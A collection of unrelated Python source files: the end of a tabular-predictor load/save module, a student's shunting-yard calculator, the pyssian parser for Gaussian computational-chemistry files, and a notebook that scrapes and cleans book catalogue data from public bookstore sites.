:class:`TabularPredictor` object
"""
logger.setLevel(verbosity2loglevel(verbosity)) # Reset logging after load (may be in new Python session)
if output_directory is None:
raise ValueError("output_directory cannot be None in load()")
output_directory = setup_outputdir(output_directory) # replace ~ with absolute path if it exists
learner = Learner.load(output_directory)
return cls(learner=learner)
def save(self):
""" Save this predictor to file in directory specified by this Predictor's `output_directory`.
Note that `fit()` already saves the predictor object automatically
(we do not recommend modifying the Predictor object yourself as it tracks many trained models).
"""
self._learner.save()
logger.log(20, "TabularPredictor saved. To load, use: TabularPredictor.load(%s)" % self.output_directory)
@staticmethod
def _summarize(key, msg, results):
if key in results:
print(msg + ": " + str(results[key]))
@staticmethod
def __get_dataset(dataset):
if isinstance(dataset, TabularDataset):
return dataset
if isinstance(dataset, str):
return TabularDataset(file_path=dataset)
if isinstance(dataset, pd.DataFrame):
return TabularDataset(df=dataset)
if isinstance(dataset, pd.Series):
raise TypeError("dataset must be TabularDataset or pandas.DataFrame, not pandas.Series. \
To predict on just single example (ith row of table), use dataset.iloc[[i]] rather than dataset.iloc[i]")
else:
raise TypeError("dataset must be TabularDataset or pandas.DataFrame or str file path to dataset")
|
<reponame>AdrianAndersen/TDT4113-Computer-Science-Programming-Project<filename>4-Calculator/Calculator.py<gh_stars>0
import numbers
import re
import numpy
from Function import Function
from logger.Logger import Logger
from Operator import Operator
from Queue import Queue
from Stack import Stack
class Calculator:
_logger = Logger()
def __init__(self, input_queue=Queue()):
self.functions = {
"EXP": Function(numpy.exp),
"LOG": Function(numpy.log),
"SIN": Function(numpy.sin),
"COS": Function(numpy.cos),
"SQRT": Function(numpy.sqrt),
}
self.operators = {
"ADD": Operator(numpy.add, 0),
"MULTIPLY": Operator(numpy.multiply, 1),
"DIVIDE": Operator(numpy.divide, 1),
"SUBTRACT": Operator(numpy.subtract, 0),
}
self.output_queue = Queue()
self.input_queue = input_queue
self.operator_stack = Stack()
def calculate_expression(self, txt):
self.create_input_queue(txt)
self._logger.debug(f"inp_text: {txt}")
self._logger.debug(f"inp_queue: {self.input_queue}")
self.create_output_queue()
temp = Stack()
self._logger.debug("\n\n\n\n\n\nSTART CALCULATE\n\n\n\n")
while not self.output_queue.is_empty():
self._logger.debug(f"output_queue: {self.output_queue}")
self._logger.debug(f"temp: {temp}")
top_peek = self.output_queue.peek()
if isinstance(top_peek, Function):
func = self.output_queue.pop()
temp.push(func.execute(temp.pop()))
elif isinstance(top_peek, Operator):
operator = self.output_queue.pop()
temp1 = temp.pop()
temp2 = temp.pop()
temp.push(operator.execute(temp2, temp1))
else:
temp.push(self.output_queue.pop())
self._logger.info(f"result: {temp}")
return temp
def create_output_queue(self):
self.output_queue = Queue()
while not self.input_queue.is_empty():
elem = self.input_queue.pop()
if isinstance(elem, numbers.Number):
self.output_queue.push(elem)
if isinstance(elem, str) and len(elem) > 1:
elem = elem.upper()
if elem in self.functions.keys():
elem = self.functions[elem]
if elem in self.operators.keys():
elem = self.operators[elem]
if isinstance(elem, Function) or elem == "(":
self.operator_stack.push(elem)
if elem == ")":
while self.operator_stack.peek() != "(":
operator = self.operator_stack.pop()
self.output_queue.push(operator)
if self.operator_stack.peek() == "(":
self.operator_stack.pop()
if isinstance(self.operator_stack.peek(), Function):
func = self.operator_stack.pop()
self.output_queue.push(func)
if isinstance(elem, Operator):
while True:
top_elem = self.operator_stack.peek()
if (
self.operator_stack.is_empty()
or top_elem == "("
or (
isinstance(top_elem, Operator)
and top_elem.get_strength() < elem.get_strength()
)
):
break
operator = self.operator_stack.pop()
self.output_queue.push(operator)
self.operator_stack.push(elem)
self._logger.debug(f"output_queue: {self.output_queue}")
while not self.operator_stack.is_empty():
operator = self.operator_stack.pop()
self.output_queue.push(operator)
return self.output_queue
def create_input_queue(self, text):
text = text.upper()
text = text.replace("(", "( ")
text = text.replace(")", " )")
input_list = text.split()
self.input_queue = Queue()
for elem in input_list:
if elem.isnumeric() or elem[0] == "-" or "." in elem:
print("numeric: ", elem)
elem = float(elem)
self.input_queue.push(elem)
return self.input_queue
|
<reponame>maserasgroup-repo/pyssian
"""
One of the two core libraries of pyssian. Contains the Classes that represent
Gaussian Files (input and output).
"""
import io
import re
from itertools import chain
from .chemistryutils import is_method, is_basis
from .linkjobparsers import LinkJob, GeneralLinkJob
# Pre-Initialized dictionary for the GaussianOutFile.Parse
Available_Linkjobs = {i:GeneralLinkJob for i in range(1,10000)}
for key in LinkJob.Register.keys():
Available_Linkjobs[key] = LinkJob.Register[key]
class GaussianOutFile(object):
"""Gaussian 09/16 '.log' file parent class, if any special type of calculation
requires different processing it should be a subclass of this one. Accepts
a context manager usage similar to 'with open(file) as F:...'
Parameters
----------
file : io.TextIOBase or str
File instance (Result of open(filename,'r')) or valid filename.
parselist : list
List of integrers that represent which types of Links to parse
(the default is None).
Attributes
----------
InternalJobs
List of InternalJobs done by gaussian i.e an gaussian calculation with
the opt freq keywords will run first an InternalJob for the Optimization
and after an InternalJob for the Frequency calculation.
"""
_interblock = -1 # interblock token
_EOF = -9999 # EOF token
def __init__(self,file,parselist=None):
cls = self.__class__
self.InternalJobs = [InternalJob(),]
if isinstance(file,io.TextIOBase):
self._file = file
else:
self._file = open(file,'r')
if parselist is None:
parselist = []
# Access the dictionary that holds the constructors for each LinkJob
self._SetParsers(parselist,cls._interblock)
# Initialize the generators/coroutines
self._BlockFetcher = self.BlockFetcher(cls._EOF,cls._interblock)
_ = next(self._BlockFetcher)
self._BlockHandler = self.BlockHandler()
_ = next(self._BlockHandler)
def __repr__(self):
cls = type(self).__name__
file = self._file.name.split('/')[-1]
size = len(self)
return f'<{cls}({file})> with {size} InternalJobs'
def __str__(self):
cls = type(self).__name__
file = self._file.name.split('/')[-1]
repr = f'<{cls}({file})>\n'
indent = ' '
for InternalJob in self:
repr += indent + f'{InternalJob} type <{InternalJob.type}>\n'
for Link in InternalJob:
repr += indent*2 + f'{Link}\n'
return repr
def __len__(self):
return len(self.InternalJobs)
def __getitem__(self,index):
return self.InternalJobs[index]
def __enter__(self):
''' Wrapper to have similar behaviour to "_io.TextIOWrapper" '''
return self
def __exit__(self, exc_type, exc_value, traceback):
''' Wrapper to have similar behaviour to "_io.TextIOWrapper" '''
return self._file.__exit__(exc_type, exc_value, traceback)
def _SetParsers(self,ParseList,interblock=-1):
Parsers = Available_Linkjobs.copy()
assert interblock not in Parsers
if ParseList:
if ParseList[0] == -1: # flag to parse all as empty
for key in Parsers:
Parsers[key] = Parsers[key].as_empty
else: # Set up the appropiate parsers
for key in Parsers:
if key not in ParseList:
Parsers[key] = Parsers[key].as_empty
else: # Parse all normally
pass
Parsers[interblock] = GeneralLinkJob.as_empty
self._Parsers = Parsers
def print_file_structure(self):
"""Display the structure of links and internal jobs of the file."""
indent = " "
Result = f"{self.__repr__():}\n"
for intjob in self:
Result += indent + f"{intjob.__repr__():}\n"
for link in intjob:
Result += indent*2 + f"{link.__repr__():}\n"
print(Result)
def read(self):
"""Alias of update for consistency with GaussianInFile class"""
self.update()
def close(self):
"""Alias to file.close for consistency with the io.TextIOBase class"""
self._file.close()
def update(self,clean=True,FinalPrint=False):
"""Tries to fetch new data. If it exists it parses it appropiately
otherwise it fails silently.
Parameters
----------
clean : Bool
If True removes all the EmptyLinkJobs found (the default is True).
FinalPrint : Bool
If True after a normal execution has finished it will print in the
console a message to notify the user (the default is False).
"""
cls = self.__class__
BlockFetcher = self._BlockFetcher
BlockHandler = self._BlockHandler
BlockType, Block = next(BlockFetcher)
while BlockType != cls._EOF:
BlockHandler.send((BlockType, Block))
BlockType, Block = next(BlockFetcher)
if self.InternalJobs[0].number is None:
self.InternalJobs[0].guess_info()
if clean:
self.clean()
if FinalPrint:
print(f"{self:!r} UPDATED")
def clean(self):
"""Removes per each InternalJob stored all the EmptyLinkJobs."""
for InternalJob in self.InternalJobs:
InternalJob.clean()
def get_links(self,*LinkIds):
"""Wrapper Method to get a list of Links with certain Ids across
the different Internal Jobs.
Parameters
----------
*LinkIds : int
Integrers that correspond to the type of links to be return.
Returns
-------
list
"""
LinkLists = [IntJob.get_links(*LinkIds) for IntJob in self.InternalJobs]
return list(chain(*LinkLists))
# Generators and Coroutines for File Parsing
def Reader(self,file):
""" Generator for line by line reading without stopiteration """
while True:
Pos_old = file.tell()
line = file.readline()
Pos_new = file.tell()
ReachedEOF = Pos_old == Pos_new
yield ReachedEOF,line
def BlockFetcher(self,EOF=-9999,interblock=-1):
"""
Generator that yields the text sliced in blocks and their type.
A block is an iterable of strings and its type refers to a token that
can be recognized by the ._Parsers variable, something in betweem
Link Blocks (interblock=-1) or no end was found (EOF=-9999)
"""
# Regex generation
re_enter = re.compile(r'(?:Enter.*l)([0-9]{1,4})(?:\.exe)')
re_exit = re.compile(r'(?:Leave\s*Link\s*)([0-9]{1,4})')
re_termination = re.compile(r'\s?([a-zA-Z]*)\stermination')
# Initialize the Reader generator
Reader = self.Reader(self._file)
yield 'Initialization done'
# If more than 1 EndKeyws then BlockType Assesment has to be modified
while True:
start = False
Block = []
# Ask the Reader until a "start line" is found
while not start:
ReachedEOF,line = next(Reader)
if ReachedEOF:
yield EOF, ''
else:
start = re_enter.findall(line)
if not start:
Block.append(line)
else: # Store the number of the Link
number = int(start[0])
# When found yield it as a "InterBlock" and prepare Block
if Block:
yield interblock, ''.join(Block)
Block = [line,]
else:
Block.append(line)
# Now that the start of the Link has been found, accumulate lines
## until the end or termination line is found
end = False
while not end:
ReachedEOF,line = next(Reader)
if ReachedEOF:
Target = Block[-10:] + [line,]
terminated = re_termination.findall(''.join(Target))
if terminated:
Block.append(line)
#if terminated[0] == 'Normal':
# other = str(BlockTypes[Termination_key])
#elif terminated[0] == 'Error':
# other = str(BlockTypes[Error_key])
break
else:
yield EOF, ''
else:
end = re_exit.findall(line)
Block.append(line)
# when end found, do return type token and yield the block
yield number, ''.join(Block)
def BlockHandler(self):
""" Coroutine. Receives a block, chooses the parser and parses it """
# Initialization
Parsers = self._Parsers
CurrentJob = self.InternalJobs[-1]
BlockType, Block = yield 'Initialization done'
while True:
#Parser = Parsers.get(BlockType,Parsers[ignore])
Parser = Parsers[BlockType]
Link = Parser(Block)
if Link.number == 1:
new_InternalJob = Link.info.new_InternalJob
else:
new_InternalJob = False
if new_InternalJob:
New = InternalJob()
self.InternalJobs.append(New)
CurrentJob = self.InternalJobs[-1]
CurrentJob.append(Link)
CurrentJob.guess_info()
else:
CurrentJob.append(Link)
BlockType, Block = yield
class InternalJob(object):
"""Gaussian 09/16 InternalJob parent class, if any special type of Job
requires different parsing it should be a subclass of this one.
Parameters
----------
number : int
ordinal number of the InternalJob (the default is None).
Attributes
----------
type
string identifier for the job.
Links
List of the different Links that belong to the InternalJob.
number
"""
def __init__(self,number=None):
self.number = number
self.type = None
self.Links = []
def __repr__(self):
cls = type(self).__name__
if self.number is None:
return f'<{cls} Created but Empty>'
else:
return f'<{cls} {self.number}>'
def __str__(self):
return f'Internal Job {self.number}: {self.type}'
def __getitem__(self,index):
return self.Links[index]
def __len__(self):
return len(self.Links)
def append(self,Link):
# Restrict to Link objects
if not isinstance(Link, LinkJob):
raise TypeError(f'{Link:!r} is not of class {LinkJob:!r}')
self.Links.append(Link)
def guess_info(self):
""" Guesses the number and type attributes of itself using the stored
Links."""
if self.Links:
Links = (Link for Link in self.Links if Link.number == 1)
try:
StarterLink = next(Links)
info = StarterLink.info
except AttributeError:
pass
except StopIteration:
pass
else:
self.number = info.number
self.type = info.type
def clean(self):
"""Removes all the Empty Link instances within Links."""
Indices2Remove = []
for i, Link in enumerate(self.Links):
if not Link.text:
Indices2Remove.append(i)
for index in reversed(Indices2Remove):
_ = self.Links.pop(index)
def get_links(self,*LinkIds):
"""Wrapper Method to get a list of Links with certain Ids.
Parameters
----------
*LinkIds : int
Integrers that correspond to the type of links to be return.
Returns
-------
list
List of Link Objects ordered by appearance in the file and filtered
by Link Number.
"""
return [Link for Link in self.Links if Link.number in LinkIds]
class GaussianInFile(object):
"""
Gaussian 09/16 .in file parent class, if any special type of input
requires different processing it should be a subclass of this one.
Parameters
----------
file : io.TextIOBase or str
File instance (Result of open(filename,'r')) or valid filename.
Attributes
----------
preprocessing : dict
Dictionary in which each key corresponds to a certain Link0 keyword
commandline : dict
Dictionary that contains the information of how the calculation
will be carried out.
title : str
title of the calculation.
method : str
If it cannot be recognized in the command line it will be empty.
basis : str
If it cannot be recognized in the command line it will be empty.
spin : int
charge : int
geometry : str-ish
It should be able to write the text block of an input file upon calling
str(geometry)
tail : list
List of str in which each should be separated from the others by a
single blank line in the input file.
structure : str
A string holding the structure of the input file. Used to write new
Input files.
nprocs : int
property to easily access and change the preprocessing['nprocshared'] value
mem : int
property to easily access and change the preprocessing['mem'] value
"""
def __init__(self,file):
# Do Something
if isinstance(file,io.TextIOBase):
self._file = file
else:
self._file = open(file,'a+')
if self._file.tell() != 0:
self._file.seek(0)
self._txt = ''
self.preprocessing = dict() # In the G16 Manual "Link 0 Commands"
self.commandline = dict() # In the G16 Manual "Route Section"
self.title = ''
self._method = ''
self._basis = ''
self.spin = 1
self.charge = 0
self.geometry = '' # In the G16 Manual "Molecule Specification"
self.tail = [] # In the G16 Manual "Optional additional sections"
self.structure = '{preprocessing}\n{commandline}\n\n'
self.structure += '{title}\n\n'
self.structure += '{charge} {spin}\n{geometry}\n\n'
self.structure += '{tail}\n\n'
def __repr__(self):
cls = type(self).__name__
file = self._file.name.split("/")[-1]
size = len(self)
return f'<{cls}({file})>'
def __str__(self):
# str repr of the preprocessing
preprocessing = []
for key,val in self.preprocessing.items():
if val:
Aux = f'%{key}={val}'
else:
Aux = f'%{key}'
preprocessing.append(Aux)
# str repr of the commandline
commandline = ['#p',]
for key,val in self.commandline.items():
if val and (len(val) == 1):
Aux = f"{key}={','.join(val)}"
elif val:
Aux = f"{key}=({','.join(val)})"
else:
Aux = f"{key}"
commandline.append(Aux)
# Prepare to format as str
kwargs = dict( preprocessing='\n'.join(preprocessing),
commandline=' '.join(commandline),
title=self.title,
charge=self.charge,
spin=self.spin,
geometry=str(self.geometry),
tail='\n\n'.join(self.tail))
return self.structure.format(**kwargs)
def __len__(self):
return len(str(self))
def __enter__(self):
''' Wrapper to have similar behaviour to "_io.TextIOWrapper" '''
return self
def __exit__(self, exc_type, exc_value, traceback):
''' Wrapper to have similar behaviour to "_io.TextIOWrapper" '''
return self._file.__exit__(exc_type, exc_value, traceback)
@property
def method(self):
return self._method
@method.setter
def method(self,other):
self.change_method(other)
@property
def basis(self):
return self._basis
@basis.setter
def basis(self,other):
self.change_basis(other)
@property
def nprocs(self):
return self.preprocessing.get('nprocshared',None)
@nprocs.setter
def nprocs(self,other):
self.preprocessing['nprocshared'] = other
@property
def mem(self):
return self.preprocessing.get('mem',None)
@mem.setter
def mem(self,other):
self.preprocessing['mem'] = other
def read(self):
"""
Reads the file and populates the appropiate attributes.
"""
txt = [line.strip() for line in self._file]
if not txt:
raise EOFError('Attempting to read an empty or non-existent file')
if txt[-1]: # If the file ends without a blank line add it
txt.append('')
if txt[-2]: # If the file ends without two blank lines add one
txt.append('')
self._txt = '\n'.join(txt)
bins = [i for i,line in enumerate(txt) if not line]
# Ensure that the if the title is empty, the bins are not including it
bins = [i for i in bins if not set((i-1,i,i+1)).issubset(set(bins))]
stop = bins[0]
header = iter(txt[:stop])
preprocessing = []
for line in header:
if line.startswith("%"):
preprocessing.append(line.lstrip("%"))
elif line.startswith("#"):
break
self.parse_preprocessing(preprocessing)
# Read the command line assuming that the keywords cannot be in a
# 'chopped in half' version between lines
commandline = [line.split(),]
for line in header:
commandline.append(line.split())
self.parse_commandline(commandline)
# Read the Title Section
start = bins[0]+1
stop = bins[1]
title = [line for line in txt[start:stop]]
self.title = '\n'.join(title)
# Read charge and spin
charge,spin = txt[stop+1].split()
self.charge,self.spin = int(charge), int(spin)
# Now we read the geometry
start = stop+1
stop = bins[2]
geometry = [line for line in txt[start+1:stop]]
self.parse_geometry(geometry)
# Now we read the Tail
tail = []
if len(txt) > stop+1: # if it exists
tail = [line for line in txt[stop:]]
self.parse_tail(tail)
def close(self):
"""Alias to file.close for consistency with the io.TextIOBase class"""
self._file.close()
def write(self,filepath=None):
"""
Writes the File object to a File. If a filepath is provided it will
write to that filepath otherwise it will attempt to write to the path
provided in the initialization.
Parameters
----------
filepath : str
A valid filepath.
"""
self._txt = str(self)
if filepath is None:
# Write to self._file
self._file.write(self._txt)
else:
# open the file write and close the file
with open(filepath,'w') as F:
F.write(self._txt)
# Helper Functions for the read function to encapsulate different behaviours
def parse_preprocessing(self,lines):
"""
Parses the lines that contain the Link 0 keywords and transforms them
into a dictionary representation.
Parameters
----------
lines : list
list of strings previously stripped. Empty lines will be ignored.
"""
#The logic of the specification of the preprocessing is below
## %kwd=something (most of the keywords follow this shape)
## %kwd (Few keywords follow this shape)
## %kwd L{number} [something,or not] (2 kewyords follow this shape)
# As initial design criteria I'm reducing the third case to the second
for line in lines:
Aux = line.split('=')
if len(Aux) == 1:
key,val = Aux,''
elif len(Aux) == 2:
key,val = Aux
else:
pass
self.preprocessing[key] = val
def parse_commandline(self,lines):
"""
Parses the lines that contain the calculation commands keywords and
transforms them into a dictionary representation.
Parameters
----------
lines : list
list of strings previously stripped. Empty lines will be ignored.
"""
# the first line contains the "#p", remove it
start = lines[0][1:]
others = [i for i in chain(*lines[1:])]
method_found = False
basis_found = False
for item in chain(start,others):
if is_method(item) and not method_found:
method_found = True
self._method = item
key,val = item, []
elif is_basis(item) and not basis_found:
basis_found = True
self._basis = item
key,val = item, []
elif is_basis(item) or is_method(item):
print('2 Basis or methods found \n')
print(f'taking {item} as a normal keyword')
key,val = item, []
else:
Aux = item.split('=',1)
if len(Aux) == 1:
key,val = Aux[0],[]
elif len(Aux) == 2:
key,val = Aux
else:
pass # Should only enter with empty items
if val and val.startswith('('):
val = val[1:-1].split(',')
elif val:
val = [val,]
previously_stored = key in self.commandline
has_suboptions = bool(self.commandline.get(key,False))
if not previously_stored:
self.commandline[key] = val
elif not has_suboptions:
self.commandline[key].extend(val)
else:
Aux3 = set(self.commandline[key]) + set(val)
self.commandline[key] = list(Aux3)
def parse_geometry(self,lines):
"""Parses each line that contains 'Atom x y z' in an appropiate form
and saves it to self.geometry
Parameters
----------
lines : list
list of strings previously stripped. Should not contain empty lines
"""
# This function is currently set up to only get the geometry as is.
# In the future it should include the logic to transform between
# coordinate specifications (zmatrix,xyz,internal) to enforce a certain
# geometry or geometry class
self.geometry = '\n'.join(lines)
def parse_tail(self,lines):
"""Chops the set of lines into different blocks of text using as
reference the emptylines/blank lines
Parameters
----------
lines : list
list of strings previously stripped.
Returns
-------
type
Description of returned object.
Raises
-------
ExceptionName
Why the exception is raised.
"""
Aux = []
self.tail = []
for line in lines:
if line:
Aux.append(line)
elif Aux:
self.tail.append('\n'.join(Aux))
Aux = []
else:
pass
else:
if Aux:
self.tail.append('\n'.join(Aux))
print('Parsed an input file withouth blank line ending')
# Modifying functions
def pop_chk(self,default=None):
"""
Removes the chk from the file, returns 'default' if the chk was not
included already
"""
if default is not None:
return self.preprocessing.pop('chk',default)
else:
return self.preprocessing.pop('chk')
def add_chk(self,name=None):
"""
Adds the chk to the file, with the specified name. If none is provided
defaults to the file name ended in .chk
"""
# Adds the chk to the file
if name is None:
try:
name = self._file.name
except AttributeError:
name = self._file.split('/')[-1]
name = name.rsplit('.')[0]+'.chk'
else:
if not name.endswith('.chk'):
name = name +'.chk'
self.preprocessing['chk'] = name
def change_method(self,method):
"""Changes appropiately the method of the calculation. Running
self.method = method makes a call to this function.
Parameters
----------
method : str
A string representation of a valid method
Raises
-------
NotImplementedError
If the method is not within the registered methods keywords
"""
if not is_method(method):
raise NotImplementedError(f'method {method} not implemented')
key = self._method
_ = self.commandline.pop(key,None) # Used to ensure deletion of the key
self._method = method
self.commandline[method] = ''
def change_basis(self,basis):
"""Changes appropiately the basis of the calculation. Running
self.basis = basis makes a call to this function.
Parameters
----------
basis : str
A string representation of a valid method if specified in the
command line.
Raises
-------
NotImplementedError
If the basis is not within the registered basis keywords
"""
if not is_basis(basis):
raise NotImplementedError(f'basis {basis} not implemented')
key = self._basis
_ = self.commandline.pop(key,None) # Used to ensure deletion of the key
self._basis = basis
self.commandline[basis] = ''
# TODO: Implement a class to read and manipulate the basis functions in the tail
# class BasisTail(object), whose str function returns things as it should and
# that can have a linked input file object, so that modifying the basis of this
# object will modify the input file basis in certain cases.
|
#!/usr/bin/env python
# coding: utf-8
# <b>Python Scraping of Book Information</b>
# In[1]:
get_ipython().system('pip install bs4')
# In[2]:
get_ipython().system('pip install splinter')
# In[3]:
get_ipython().system('pip install webdriver_manager')
# In[1]:
# Setup splinter
from splinter import Browser
from bs4 import BeautifulSoup
from webdriver_manager.chrome import ChromeDriverManager
import time
import pandas as pd
import requests
# In[ ]:
# In[42]:
# executable_path = {'executable_path': ChromeDriverManager().install()}
# browser = Browser('chrome', **executable_path, headless=False)
# url = 'http://books.toscrape.com/'
# browser.visit(url)
# for x in range(50):
# html = browser.html
# soup = BeautifulSoup(html, 'html.parser')
# articles = soup.find_all('article', class_='product_pod')
# for article in articles:
# h3 = article.find("h3")
# link = h3.find("a")
# href = link["href"]
# title = link["title"]
# print("----------")
# print(title)
# url = "http://books.toscrape.com/" + href
# browser.visit(url)
# try:
# current_page = current_page + 1
# web_page_url = f"https://books.toscrape.com/catalogue/category/books_1/page-{current_page}.html"
# browser.visit(web_page_url)
# browser.links.find_by_partial_text("next").click()
# print('It worked')
# except:
# print("Scraping Complete")
# browser.quit()
# In[57]:
# executable_path = {'executable_path': ChromeDriverManager().install()}
# browser = Browser('chrome', **executable_path, headless=False)
# pageNumber= pageNumber + 1
# url = 'http://books.toscrape.com/'
# pageUrl = f'http://books.toscrape.com/catalogue/page-{pageNumber}.html'
# browser.visit(url)
# html = browser.html
# soup = BeautifulSoup(html, 'html.parser')
# for x in range(20):
# html = browser.html
# soup = BeautifulSoup(html, 'html.parser')
# articles = soup.find_all('article', class_='product_pod')
# for article in articles:
# h3 = article.find("h3")
# link = h3.find("a")
# href = link["href"]
# title = link["title"]
# print("----------")
# print(title)
# #time.sleep(1)
# url = "http://books.toscrape.com/" + href
# browser.visit(url)
# try:
# browser.visit(pageUrl)
# browser.links.find_by_partial_text("next").click()
# except:
# print("Scraping Complete")
# browser.quit()
# In[2]:
#Working through each book and page
executable_path = {'executable_path': ChromeDriverManager().install()}
browser = Browser('chrome', **executable_path, headless=False)
pageUrl=""
for i in range(1,3):
if(i == 1):
pageUrl = f"https://books.toscrape.com/index.html"
else:
pageUrl = f'https://books.toscrape.com/catalogue/page-{i}.html'
print(pageUrl)
browser.visit(pageUrl)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
articles = soup.find_all('article', class_='product_pod')
for article in articles:
h3 = article.find("h3")
link = h3.find("a")
href = link["href"]
title = link["title"]
print("----------")
print(title)
#time.sleep(1)
url = "http://books.toscrape.com/" + href
browser.visit(url)
browser.quit()
# In[97]:
#Proof of concept using books.toscrape.com
executable_path = {'executable_path': ChromeDriverManager().install()}
browser = Browser('chrome', **executable_path, headless=False)
pageUrl=""
for i in range(1,2):
if(i == 1):
pageUrl = f"https://books.toscrape.com/index.html"
else:
pageUrl = f'https://books.toscrape.com/catalogue/page-{i}.html'
print(pageUrl)
browser.visit(pageUrl)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
articles = soup.find_all('article', class_='product_pod')
for article in articles:
h3 = article.find("h3")
link = h3.find("a")
href = link["href"]
title = link["title"]
print("----------")
print(title)
#time.sleep(1)
url = "http://books.toscrape.com/" + href
browser.visit(url)
res=requests.get(url)
soup = BeautifulSoup(res.content,'lxml')
table = soup.find_all('table')[0]
df = pd.read_html(str(table))[0]
print(df)
browser.quit()
# In[20]:
executable_path = {'executable_path': ChromeDriverManager().install()}
browser = Browser('chrome', **executable_path, headless=False)
pageUrl=""
table_of_tables = []
for i in list(50,75,100):
table_on_page = []
if(i == 25):
pageUrl = f"https://books.toscrape.com/index.html"
else:
pageUrl = f'https://books.toscrape.com/catalogue/page-{i}.html'
print(pageUrl)
browser.visit(pageUrl)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
articles = soup.find_all('article', class_='product_pod')
for article in articles:
h3 = article.find("h3")
link = h3.find("a")
href = link["href"]
title = link["title"]
print("----------")
print(title)
#time.sleep(1)
url = "http://books.toscrape.com/" + href
browser.visit(url)
res=requests.get(url)
soup = BeautifulSoup(res.content,'lxml')
table = soup.find_all('table')[0]
table_on_page.append(table)
# table_of_tables.append(table_on_page)
df = pd.read_html(str(table))[0]
print(df)
browser.quit()
# In[61]:
# In[48]:
df = pd.DataFrame(table_on_page)
df.to_csv('books2scrape.csv')
# In[52]:
df_to_clean=pd.read_csv('books2scrape.csv')
# In[64]:
df_columns_cleaned = df_to_clean.drop(columns=['Unnamed: 0','0','2','4','6','8','10','12','14'])
# In[71]:
df_columns_cleaned.columns
# In[66]:
df_columns_cleaned.head()
# In[78]:
html_chars = ["<tr>","\n","</th>","<th>","<td>","</td>",
"</tr>"]
for char in html_chars:
df_columns_cleaned['1'] = df_columns_cleaned['1'].str.replace(char, ' ')
df_columns_cleaned['3'] = df_columns_cleaned['3'].str.replace(char, ' ')
df_columns_cleaned['5'] = df_columns_cleaned['5'].str.replace(char, ' ')
df_columns_cleaned['7'] = df_columns_cleaned['7'].str.replace(char, ' ')
df_columns_cleaned['9'] = df_columns_cleaned['9'].str.replace(char, ' ')
df_columns_cleaned['11'] = df_columns_cleaned['11'].str.replace(char, ' ')
df_columns_cleaned['13'] = df_columns_cleaned['13'].str.replace(char, ' ')
# In[79]:
df_columns_cleaned
# In[290]:
# executable_path = {'executable_path': ChromeDriverManager().install()}
# browser = Browser('chrome', **executable_path, headless=False)
# pageUrl=""
# table_of_tables = []
# for i in range(1):
# table_on_page = []
# pageUrl = f'ttps://www.hpb.com/books/best-sellers/784-classics?&size=350&&&'
# print(pageUrl)
# browser.visit(pageUrl)
# html = browser.html
# soup = BeautifulSoup(html, 'html.parser')
# articles = soup.find_all('article', class_='product_pod')
# for article in articles:
# time.sleep(randint(1,3))
# section = article.find("section")
# link = section.find("a")
# href = link["href"]
# print(href)
# title = link["title"]
# print("----------")
# print(title)
# time.sleep(randint(1,3))
# url = href
# browser.visit(url)
# res=requests.get(url)
# time.sleep(randint(3,5))
# soup = BeautifulSoup(res.content,'lxml')
# table = soup.find_all('table')[0]
# table_on_page.append(table)
# # table_of_tables.append(table_on_page)
# df = pd.read_html(str(table))[0]
# print(df)
# browser.quit()
# In[198]:
#https://stackoverflow.com/questions/31064981/python3-error-initial-value-must-be-str-or-none-with-stringio
import io
# In[267]:
#grab data from https://citylights.com/greek-roman/
import random
executable_path = {'executable_path': ChromeDriverManager().install()}
browser = Browser('chrome', **executable_path, headless=False)
table_of_data = []
pageUrl=""
for i in range(1,7):
data_on_page = []
if(i == 1):
pageUrl = f"https://citylights.com/greek-roman/"
else:
pageUrl = f'https://citylights.com/greek-roman/page/{i}/'
print(pageUrl)
time.sleep(1)
browser.visit(pageUrl)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
#https://stackoverflow.com/questions/52842778/find-partial-class-names-in-spans-with-beautiful-soup
articles = soup.find_all('li', attrs={'class': lambda e: e.startswith('product type-product post') if e else False})
for article in articles:
time.sleep(1)
link = article.find('a')
href = link["href"]
print("----------")
print(href)
url = href
browser.visit(url)
time.sleep(randint(1,2))
res=requests.get(url)
soup = BeautifulSoup(res.content,'lxml')
data = soup.find_all('div', attrs={'class': 'detail-text mb-50'})[0].get_text()
data_on_page.append(data)
table_of_data.append(data_on_page)
df = pd.DataFrame(table_of_data)[0]
print(data)
browser.quit()
# In[268]:
df.to_csv('greek-roman.csv')
# In[269]:
df_greek_roman_to_clean=pd.read_csv('greek-roman.csv')
df_greek_roman_to_clean_columns = df_greek_roman_to_clean.drop(columns=['Unnamed: 0'])
# In[270]:
df_greek_roman_to_clean_columns
# In[271]:
df_greek_roman_to_clean_columns_split = df_greek_roman_to_clean_columns['0'].str.split("\n\t")
# In[272]:
df_greek_roman = df_greek_roman_to_clean_columns_split.to_list()
column_names = ['0','ISBN-10','ISBN-13','Publisher','Publish Date', 'Dimensions']
new_greek_roman_df = pd.DataFrame(df_greek_roman,columns=column_names)
# In[273]:
clean_greek_roman_df=new_greek_roman_df.drop(columns=['0','Dimensions'])
# In[274]:
clean_greek_roman_df.head()
# In[275]:
html_chars = ["<tr>","\n","</th>","<th>","<td>","</td>",
"</tr>",'\t']
for char in html_chars:
clean_greek_roman_df['ISBN-10'] = clean_greek_roman_df['ISBN-10'].str.replace(char, ' ')
clean_greek_roman_df['ISBN-13'] = clean_greek_roman_df['ISBN-13'].str.replace(char, ' ')
clean_greek_roman_df['Publisher'] = clean_greek_roman_df['Publisher'].str.replace(char, ' ')
clean_greek_roman_df['Publish Date'] = clean_greek_roman_df['Publish Date'].str.replace(char, ' ')
# In[276]:
pd.set_option("max_colwidth", 1000)
clean_greek_roman_df.head()
# In[277]:
clean_greek_roman_df.to_csv('greek-roman-clean.csv')
# In[ ]:
# In[279]:
# grab data from https://citylights.com/asian/
import random
executable_path = {'executable_path': ChromeDriverManager().install()}
browser = Browser('chrome', **executable_path, headless=False)
table_of_data = []
pageUrl=""
for i in range(1,5):
data_on_page = []
if(i == 1):
pageUrl = f"https://citylights.com/asian/"
else:
pageUrl = f'https://citylights.com/asian/page/{i}/'
print(pageUrl)
time.sleep(1)
browser.visit(pageUrl)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
#https://stackoverflow.com/questions/52842778/find-partial-class-names-in-spans-with-beautiful-soup
articles = soup.find_all('li', attrs={'class': lambda e: e.startswith('product type-product post') if e else False})
for article in articles:
